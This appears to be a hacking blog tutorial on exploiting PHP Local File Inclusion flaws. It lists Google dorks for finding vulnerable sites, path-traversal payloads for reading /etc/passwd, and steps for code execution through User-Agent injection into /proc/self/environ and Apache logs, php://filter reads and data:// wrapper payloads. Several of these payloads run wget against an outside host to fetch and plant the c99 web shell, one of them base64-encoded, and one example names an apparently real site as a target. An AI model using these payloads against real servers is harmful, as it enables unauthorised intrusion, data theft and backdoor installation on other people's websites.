2. Finding LFI vulnerabilities
3. Exploiting LFI vulnerabilities
-/proc/self/environ
-/proc/self/fd
- Log poisoning
- wrapper php://filter
- wrapper data://
What is LFI?
Code:
LFI stands for Local File Inclusion. LFI is a type of web-application security vulnerability. LFI is only one of many web-application security vulnerabilities. Web-applications is applications(in other words: pages/websites) you can view and interact with in your web browser.
2. Finding LFI vulnerabilities
You can easily find it.. .First lets take a look at a php code that is vulnerable to LFI:
Code:
PHP Code:
<?php
$page = $_GET[page];
include($page);
?>Now To check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages.
lets see it
Normal link : http://www.site.com/ru/page.php?d=1
Injection link : http://www.bid-qualitysummit.com/ru/page.php?d=1asdfgd
Output:
Its not always you will get an error message. Sometimes the script might even redirect you to the home page or something when it detects an error.
Dorks:
Code:
inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians .php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining .php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php
3. Exploiting LFI vulnerabilities
There are 5 methods.
- /proc/self/environ
- /proc/self/fd (i will update it later)
- log poisioning
- using wrapper php://filter
- using wrapper data:
/proc/self/environ
Lets say that you have successfully found a vulnerable page.
The URL is http://www.site.com/index.php?page=index
Now replace index with /etc/passwd so it will look like this
Code:
www.site.com/index.php?page=/etc/passwd
Code:
/../etc/passwd
/../../etc/passwd
/../../../etc/passwdIf you try just /etc/passwd and if you are lucky you will get this
Now thats good. You can include files from server.
Now replace /etc/passwd with /proc/self/environ
so your url will look like this :
Code:
www.site.com/index.php?page=/proc/self/environ
Now download and install "tamper data plugin in
Go to tools - tamper data
it will look like this
So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.
so it will open tamper data and ask us to tamper so click on tamper
In the User-Agent field, type:
PHP Code:
<?php phpinfo();?>
Now search for "disable_functions" (Ctrl+F Search function)
Mine is
That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
PHP Code:
<?exec('wget http ://www.tektao.com.cn/files/c99.txt -O shell.php');?>Save it and refresh your site.
Go to
Code:
http://www.site.com/shell.php
Code:
www.site.com/index.php?page=shell.phpEnjoy.
Using log poisioning
After knowing you can include any file(s) with a LFI. You could try log poisoning to execute PHP code to gain higher access to In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly for us I believe this have been made "impossible" in newer versions of apache(the most used web server). Nonetheless. It does not stop us from trying.
First, try including various known locations for the apache logs. Here are a few common paths:
Code:
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access. log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_l og
/usr/local/apache/logs/error.l og
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.logLets say we can include /var/www/logs/access.log.
so our url will be
Code:
http://www.site.com/index.php?page=/var/www/logs/access.log
Code:
11.11.11.11 – - [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1″ 200 230 “-” “Mozilla/5.0 (Windows ; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1″ 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11″
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test .php HTTP/1.1″ 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164″ – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11so we can see logfile stores also our user agent
so we can exploit it via user agent same in /proc/self/environ
lets we change user agent to
PHP Code:
<? Php echo ‘test’;?>so now output will be
Code:
11.11.11.11 – - [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1″ 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1″ 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11″
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1″ 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164″ – “” test ”if you get test then we can spawn our shell just by changing user agent to
PHP Code:
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
Code:
http://www.site.com/shell.php
Code:
www.site.com/index.php?page=shell.phpEnjoy.
Using wrapper php://filter:
what is php://filter ??
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.
Well as hacker You can read some yummy file like configuration.php,index.php,database.php etc..
Lets see we read index.php file
Injection link:
Code:
http://site.com/index.php?file=php://filter/convert .base64-encode/resource=index
To read you have to decode that content at
base64decode.org
thats it .
Using wrapper data://
The data: (» RFC 2397) stream wrapper is available since PHP 5.2.0.
Taking advantage of PHP’s RFC 2397 support (http://php.net/manual/en/wrappers.data.php), you can inject the PHP code you want executed directly into the URL.
Lets see it:
Code:
http://www.site.com/index.php?page=data:,?&cmd=whoamiIt also supports base 64 Encoding...
Code:
http://www.site.com/index.php?page=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoamiUsing the base64 encoding, you may be able to shorten your injection pending that they have size restrictions.
Also notice above, when using $_GET[cmd], there aren’t any quotes used. This still works effectively and it comes in handy if the server has magic_quotes enabled
Note:You can upload shell using it like Encode
PHP Code:
<? exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php'); ?>
Code:
PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS50eHQgLU8gc2hlbGwucGhwXCcpOyA/Pg==so injection will be
Code:
http://www.site.com/index.php?page=
data:;base64,PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS50eHQgLU8gc2hlbGwucGhwXCcpOyA/Pg==Now navigate to
Code:
http://www.site.com/shell.php
Code:
http://www.site.com/index.php?page=shell.phpThank you !!
0 comments:
Post a Comment